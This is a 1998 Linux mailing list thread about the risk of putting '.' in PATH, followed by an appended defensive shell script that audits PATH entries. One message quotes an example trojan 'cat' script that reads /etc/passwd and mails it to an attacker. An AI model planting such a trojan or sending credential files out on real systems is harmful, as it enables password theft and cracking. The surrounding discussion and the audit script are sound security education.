According to Karel Bemelmans: While burning my CPU.
>
> On Sun, 30 Aug 1998, Mike wrote:
>
> > Date: Sun, 30 Aug 1998 16:04:59 +0100 (GMT)
> > From: Mike <[EMAIL PROTECTED]>
> > Reply-To: Mike Ricketts <[EMAIL PROTECTED]>
> > To: Gevaerts Frank <[EMAIL PROTECTED]>
> > Cc: Kenneth Stephen <[EMAIL PROTECTED]>,
> >     linux-newbie <[EMAIL PROTECTED]>
> > Subject: Re: Correctness of the newbie FAQ
> >
> > On Sat, 29 Aug 1998, Gevaerts Frank wrote:
> >
> > > If you don't have '.' in your path, you can't execute programs in the
> > > current directory, unless you type in a full pathname. If you have it in
> > > your path, and some malicious user makes a nasty script and calls it ls,
> > > if you try to do 'ls' in his home directory, you will in fact execute his
> > > script.
> > > You can avoid this by placing '.' last in your path, but as the FAQ points
> > > out, our evil user could then make a script 'sl', hoping you would make a
> > > typo in his home directory.
> > > If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> > > you can only execute binaries in those directories, in which normal users
> > > can't (or shouldn't be able to) change anything.
> > >
> > There is an even more serious possibility if a user has '.' at the start
> > of their path. Consider a user with . in their path, who has a login
> > script something like:
> > # .bash_profile
> >
> > # Get the aliases and functions
> > if [ -f ~/.bashrc ]; then
> > . ~/.bashrc
> > fi
> >
> > # User specific environment and startup programs
> >
> > PATH=.:$PATH:$HOME/bin
> > ENV=$HOME/.bashrc
> > USERNAME=""
> >
> > export USERNAME ENV PATH
> >
> > cat ~/todo
> >
> > Now a hacker creates a script in that user's home directory, called cat,
> > that does
> > #!/bin/bash
> > /bin/cat /etc/passwd | mail [EMAIL PROTECTED]
> > /bin/cat $*
> >
> > Now the next time your user logs in, your password file gets mailed and
> > the hacker can carry out a dictionary attack. Not good.
>
> Aren't we being a bit too paranoid ?
>
> First, if he gets access to your account, even ftp only, he might just
> download the /etc/passwd file right away. And second, most systems use
> shadow, so /etc/passwd is useless for a cracker.
Do not forget:
3) If it's left as it is installed, which is -rw-r--r--, "anyone" can read or
cat it anyway.
After all, the passwd is encrypted; OK, so encryption is not secure.
>
>
> Karel
>
>
> Karel Bemelmans, Narfum Inc.
>
> [-- Contact --] --> [EMAIL PROTECTED]
> [-- Website --] --> http://www.narfum.org
>
--
Regards Richard.
[EMAIL PROTECTED]
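
A check for the PATH problem discussed in this thread, added here as an example and not part of the original messages. It goes slightly beyond the thread: besides '.', it flags empty entries (which the shell also treats as the current directory) and absolute entries that are world-writable. The function name audit_path and the sample PATH are assumptions made for illustration.

```shell
#!/bin/sh
# audit_path PATHSTRING   (hypothetical helper name, not from the thread)
# Prints one line per PATH entry that can resolve to a directory someone else
# controls, and returns 1 if anything was reported (0 if the PATH is clean).
audit_path() {
    ap_rest="$1:"        # sentinel ':' so a trailing empty entry is seen
    ap_idx=0
    ap_bad=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}      # text before the first ':'
        ap_rest=${ap_rest#*:}        # everything after it
        ap_idx=$((ap_idx + 1))
        case $ap_entry in
            '')
                # A leading ':', a trailing ':' or '::' all mean current directory
                echo "entry $ap_idx: empty entry (treated as current directory)"
                ap_bad=1 ;;
            /*)
                # Absolute path: still unsafe if any user can drop files into it
                if [ -n "$(find -H "$ap_entry" -prune -type d -perm -0002 2>/dev/null)" ]; then
                    echo "entry $ap_idx: $ap_entry is world-writable"
                    ap_bad=1
                fi ;;
            *)
                # '.', './bin', 'bin', '..': all depend on where you are standing
                echo "entry $ap_idx: '$ap_entry' is relative to the current directory"
                ap_bad=1 ;;
        esac
    done
    return "$ap_bad"
}

# Constructed sample modelled on the .bash_profile quoted in the thread
# (PATH=.:$PATH:$HOME/bin with a typical system PATH substituted in).
audit_path ".:/bin:/usr/bin:/home/user/bin" || :
```

Run it against the live value with `audit_path "$PATH"`; entry numbers start at 1 and count empty entries too.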